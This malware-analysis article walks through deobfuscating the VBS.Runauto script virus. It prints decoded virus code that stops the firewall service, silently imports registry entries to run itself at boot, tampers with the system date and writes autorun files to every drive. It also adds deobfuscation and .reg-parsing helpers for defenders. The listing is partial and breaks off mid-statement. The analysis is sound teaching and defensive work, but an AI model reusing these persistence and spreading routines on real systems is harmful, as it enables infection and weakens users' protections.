Example Analysis of VBS.Runauto script virus

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/03 Report--

This article walks through a sample analysis of the VBS.Runauto script virus. The editor found it very practical and shares it here for reference.

Recently a colleague's notebook picked up this virus. Since I happen to be teaching VBScript to computer-science majors this semester, I took the opportunity to analyze it.

First the virus sample was extracted from the infected machine. As it was found unexpectedly and I had no special preparation, I simply packed it with WinRAR and saved it.

When I opened the archive of the sample on the test machine, Symantec 11 immediately raised an alert and deleted the virus. To analyze a virus you therefore have to disable the antivirus software or configure an exclusion: I created a new folder "evA" on the desktop, set it as an antivirus exclusion folder, and the samples then sat quietly inside it.

Script viruses are interpreted programs, so no special decompilation tool is needed to view the source. Windows Notepad is enough, but I prefer UltraEdit.

Open the virus file in UltraEdit, as shown in Figure 1. To avoid triggering the virus by accident, change the .vbs extension to .txt first, so that a stray double-click opens it in an editor instead of handing it to the script host.

Figure 1: the virus script

Opening the script shows code with very poor readability: a jumble of upper- and lower-case letters and long runs of unintelligible symbol strings. This is the "cover" the virus uses to protect itself.

The case-mangling is easy to undo: select the text in UE (UltraEdit from here on) and press Ctrl+F5 to convert it to lowercase. The "ciphertext" strings such as "00c233%" are more troublesome.

Wherever such "garbage" appears in the code, it is passed through the STrREVeRSE and unEscaPE functions. Unescape is a standard VBScript function that decodes a string encoded with Escape. Escape works like URL encoding: because HTML reserves certain symbols, they cannot be written directly, and Escape replaces spaces, most punctuation, accented letters and other non-ASCII characters with %xx, where xx is the hexadecimal code of the character; a space becomes %20, for example. Characters with codes above 255, such as Chinese, are stored as %uxxxx. Looking at the "ciphertext" shows that the escaped string has also been reversed, and the name StrReverse confirms it: to slip past antivirus signatures, the author stores the key strings both encoded and mirrored.

UE can encode and decode strings directly, but it has nothing ready-made for mirroring a string. Since I happen to be teaching the students JavaScript at the moment, I wrote a small page that reverses and decodes (or encodes) a string. It is trivial, but for the sake of continuity here it is:

The copy code is as follows:

<html>
<body>
<h3>String reverse</h3>
<form name="rev">
  <input type="text" name="instr" size="80">
  <input type="checkbox" name="order"> Conversion order (reverse first, then decode)?
  <input type="button" value="Convert" onclick="_reverse()">
</form>
<script type="text/javascript">
function _reverse()
{
    var rev = document.rev;
    if (rev.order.checked) {
        // reverse first, then decode (the order the virus uses)
        var revedstr = rev.instr.value.split('').reverse().join('');
        document.write("reversed string: ", revedstr, "<br>");
        document.write("unescape string: ", unescape(revedstr), "<br>");
        document.write("escape string: ", escape(revedstr), "<br>");
    } else {
        // decode first, then reverse
        var unescapstr = unescape(rev.instr.value);
        var revedstr = unescapstr.split('').reverse().join('');
        document.write("unescape string: ", unescapstr, "<br>");
        document.write("reversed string: ", revedstr);
    }
    // document.write after the page has loaded replaces the page; reload it to convert another string
}
</script>
</body>
</html>
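Pasting one string at a time into the page above works, but a whole script can be unwrapped in one pass. The following is an added example, not the article's tool and not the virus author's code: a Node.js script that finds every StrReverse(...) or Unescape(...) call whose argument is a string literal, in any letter case and in either nesting order, replaces it with the decoded literal, and repeats until nothing changes. It assumes the wrapped arguments are plain double-quoted VBScript literals and that the script has no comments containing unbalanced quotes; the obfuscate() helper and SAMPLE_LINE are constructed here only to exercise it.

```javascript
// Added example (not from the article): batch-decode StrReverse/Unescape
// string wrapping across a whole VBScript file. Assumptions: wrapped arguments
// are double-quoted literals; wrappers are StrReverse() and Unescape() only.

// A StrReverse( "..." ) or Unescape( "..." ) call with a literal argument.
// VBScript writes a quote inside a literal as "", so the body is [^"] or "".
const WRAPPED = /\b(strreverse|unescape)\s*\(\s*"((?:[^"]|"")*)"\s*\)/gi;

const vbsUnquote = s => s.replace(/""/g, '"');
const vbsQuote = s => '"' + s.replace(/"/g, '""') + '"';

// Replace every innermost wrapped literal with the literal it evaluates to.
function decodeOnce(src) {
  return src.replace(WRAPPED, (_m, fn, lit) => {
    const inner = vbsUnquote(lit);
    const out = fn.toLowerCase() === 'strreverse'
      ? [...inner].reverse().join('')   // mirror the string
      : unescape(inner);                // %xx and %uxxxx, same rules as VBScript Unescape
    return vbsQuote(out);
  });
}

// Repeat until a fixed point, so unescape(strreverse("...")) and the opposite
// nesting both unwind inside-out. Calls on non-literals are left alone.
function deobfuscate(src, maxRounds = 20) {
  let cur = src;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeOnce(cur);
    if (next === cur) return cur;
    cur = next;
  }
  return cur;
}

// Decoded literals may now contain line breaks (the .reg file text does);
// split them with continuations so the result is valid VBScript again.
function splitMultilineLiterals(src) {
  return src.replace(/"((?:[^"]|"")*)"/g, (m, body) =>
    body.includes('\n')
      ? body.split(/\r?\n/).map(p => '"' + p + '"').join(' & vbCrLf & _\n    ')
      : m);
}

function deobfuscateScript(src) {
  return splitMultilineLiterals(deobfuscate(src));
}

// For a single wrapped expression: the plain string it evaluates to.
function decodeString(expr) {
  const m = deobfuscate(expr).match(/^\s*"((?:[^"]|"")*)"\s*$/);
  if (!m) throw new Error('did not reduce to one literal: ' + expr);
  return vbsUnquote(m[1]);
}

// Constructed sample in the virus's style: escape() the text, mirror it, and
// wrap it in case-mangled calls so it must be reversed first, then decoded.
function obfuscate(plain) {
  const mirrored = [...escape(plain)].reverse().join('');
  return 'uNeScApE(sTrReVeRsE("' + mirrored + '"))';
}

const SAMPLE_LINE = 'Set wshshell=CreateObject(' + obfuscate('wscript.shell') + ')';

console.log(SAMPLE_LINE);
console.log(deobfuscateScript(SAMPLE_LINE));
```

Feed a whole file to deobfuscateScript() and the output is again valid VBScript: literals that now contain line breaks (such as the .reg text) are split with vbCrLf continuations. Calls whose argument is built at run time from something other than a literal, like strreverse(y), are deliberately left untouched, so those still need to be read by hand after the pass.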

Decoded with the tool above, the code reads as follows (the helper functions writefile, listdrv and writeauto that it calls are not part of this excerpt):

The copy code is as follows:

On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set wshshell = CreateObject(strreverse("wscript.shell"))
Dim dri_list, dri_list0
Dim issend
issend = 0
c_time = Date()

' Stop SharedAccess, the Internet Connection Sharing / Windows Firewall service
wshshell.run "net stop sharedaccess", 0

Set drvs = fso.drives
sysdir = fso.GetSpecialFolder(1)   ' WindowsFolder=0, SystemFolder=1, TemporaryFolder=2
thispath = wscript.ScriptFullName

' Read its own source into scopy so it can copy itself later
Set fc = fso.OpenTextFile(thispath, 1)   ' ForReading=1, ForWriting=2, ForAppending=8
scopy = fc.readall
fc.Close
Set fc = Nothing

' Write the registry file sysinfo.reg, which registers the virus as a machine
' startup script so the system runs it automatically at boot.
' (The binary exectime data is illegible in the decoded listing and is left out here.)
Call writefile(sysdir & "\sysinfo.reg", _
    "windows registry editor version 5.00" & vbCrLf & _
    "[hkey_local_machine\software\policies\microsoft\windows\system\scripts\startup\0\0]" & vbCrLf & _
    """script""=""%windir%\\system32\\prncfg.vbs""" & vbCrLf & _
    """parameters""=""""" & vbCrLf & _
    """exectime""=hex(b):" & vbCrLf & _
    "[hkey_local_machine\software\microsoft\windows\currentversion\group policy\state\machine\scripts\startup\0]" & vbCrLf & _
    """script""=""%windir%\\system32\\prncfg.vbs""" & vbCrLf & _
    """parameters""=""""" & vbCrLf & _
    """exectime""=hex(b):")

' Import sysinfo.reg silently, then remove it
wshshell.run "regedit /s sysinfo.reg", 0
wscript.sleep 200
fso.deletefile sysdir & "\sysinfo.reg", True

' If the running copy is already inside the system directory
If InStr(thispath, sysdir) > 0 Then
    dri_list0 = listdrv()
    ' Set the clock back one year (the Mid/Right argument lists are illegible in the decoded listing)
    o_time = Left(c_time, 3) & CStr(Int(Mid( )) - 1) & Right(Len(c_time) - 4)
    wshshell.run "cmd /c date " & o_time, 0
    wscript.sleep 10000
    ' Write an autorun file to the root of every drive
    For dri_i = 1 To Len(dri_list0)
        Call writeauto(Mid(dri_list0, dri_i, 1) & ":\")
    Next
    ' Put the date back
    wshshell.run "cmd /c date " & c_time, 0

    ' Query the computer name and user name through WMI
    computername = "": username = ""
    Set objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    Set colcomputers = objwmiservice.execquery("select * from win32_computersystem")
    For Each objcomputer In colcomputers
        computername = objcomputer.name
        username = objcomputer.username
    Next
    If username = "" Then username = "evar"
    If InStr(username, "\")
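What sysinfo.reg actually installs is easier to see when the dropped file is parsed than when it is read inline. The following is an added example, not part of the article: a Node.js parser for .reg exports that reports every string value under a Group Policy Scripts\Startup or Scripts\Logon key, or a CurrentVersion\Run key, that points at a script or executable. SAMPLE_REG is constructed here to mirror the page's sysinfo.reg: the two key paths are those from the decoded listing, while the ExecTime bytes are invented because that value is illegible in the listing.

```javascript
// Added example (not from the article): parse a Windows .reg export and list
// the startup-script / Run-key registrations it would install.

// Constructed sample modelled on the page's sysinfo.reg (ExecTime bytes invented).
const SAMPLE_REG = [
  'Windows Registry Editor Version 5.00',
  '',
  '[HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\Scripts\\Startup\\0\\0]',
  '"Script"="%windir%\\\\system32\\\\prncfg.vbs"',
  '"Parameters"=""',
  '"ExecTime"=hex(b):00,00,00,00,\\',
  '  00,00,00,00',
  '',
  '[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Scripts\\Startup\\0]',
  '"Script"="%windir%\\\\system32\\\\prncfg.vbs"',
  '"Parameters"=""',
  '"ExecTime"=hex(b):00,00,00,00,00,00,00,00',
].join('\r\n');

// Registry locations that run a program at boot or logon.
const PERSISTENCE_PATHS = [
  /\\Scripts\\(Startup|Logon)\\/i,            // Group Policy script entries
  /\\CurrentVersion\\Run(Once|Services)?$/i,  // classic Run keys
];

// Type codes that .reg writes as hex(N):
const HEX_TYPES = { 2: 'REG_EXPAND_SZ', 7: 'REG_MULTI_SZ', b: 'REG_QWORD' };

// Join continuation lines: a trailing backslash means hex data continues.
function logicalLines(text) {
  const out = [];
  let buf = null;
  for (const raw of text.split(/\r?\n/)) {
    let line = raw.trim();
    const cont = line.endsWith('\\');
    if (cont) line = line.slice(0, -1).trim();
    buf = buf === null ? line : buf + line;
    if (cont) continue;
    out.push(buf);
    buf = null;
  }
  if (buf !== null) out.push(buf);
  return out;
}

// Undo .reg string escaping (\\ and \").
const unescapeReg = s => s.replace(/\\(.)/g, '$1');

function decodeValue(raw) {
  let m;
  if ((m = raw.match(/^"((?:[^"\\]|\\.)*)"$/))) return { type: 'REG_SZ', data: unescapeReg(m[1]) };
  if ((m = raw.match(/^dword:([0-9a-f]{8})$/i))) return { type: 'REG_DWORD', data: parseInt(m[1], 16) };
  if ((m = raw.match(/^hex(?:\(([0-9a-f]+)\))?:(.*)$/i))) {
    const type = m[1] ? (HEX_TYPES[m[1].toLowerCase()] || 'REG_TYPE_' + m[1]) : 'REG_BINARY';
    return { type, data: m[2].split(',').filter(Boolean).map(b => parseInt(b, 16)) };
  }
  return { type: 'UNKNOWN', data: raw };
}

// Returns [{ path, deleted, values: { name: { type, data } } }, ...]
function parseReg(text) {
  const keys = [];
  let current = null;
  for (const line of logicalLines(text)) {
    if (!line || line.startsWith(';') || /^Windows Registry Editor/i.test(line)) continue;
    let m;
    if ((m = line.match(/^\[(-?)(.+)\]$/))) {
      current = { path: m[2], deleted: m[1] === '-', values: {} };
      keys.push(current);
    } else if (current && (m = line.match(/^(?:@|"((?:[^"\\]|\\.)*)")=(.*)$/))) {
      const name = m[1] === undefined ? '@' : unescapeReg(m[1]);
      current.values[name] = decodeValue(m[2]);
    }
  }
  return keys;
}

// Every string value under a persistence key that names a script or program.
function findPersistence(keys) {
  const hits = [];
  for (const key of keys) {
    if (key.deleted || !PERSISTENCE_PATHS.some(p => p.test(key.path))) continue;
    for (const [name, val] of Object.entries(key.values)) {
      if (val.type === 'REG_SZ' && /\.(vbs|vbe|js|jse|wsf|bat|cmd|exe|ps1)\b/i.test(val.data)) {
        hits.push({ key: key.path, value: name, target: val.data });
      }
    }
  }
  return hits;
}

const HITS = findPersistence(parseReg(SAMPLE_REG));
for (const h of HITS) console.log(`${h.key} -> ${h.value} = ${h.target}`);
```

For a real export call parseReg(fs.readFileSync(path, 'utf16le')), since regedit writes .reg files as UTF-16 LE with a byte-order mark (trim() strips the mark). The same check applies to a live machine: before trusting a system this virus has touched, inspect those two Scripts\Startup keys under HKLM, and remember that the prncfg.vbs they point at in system32 is the copy that runs at every boot.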
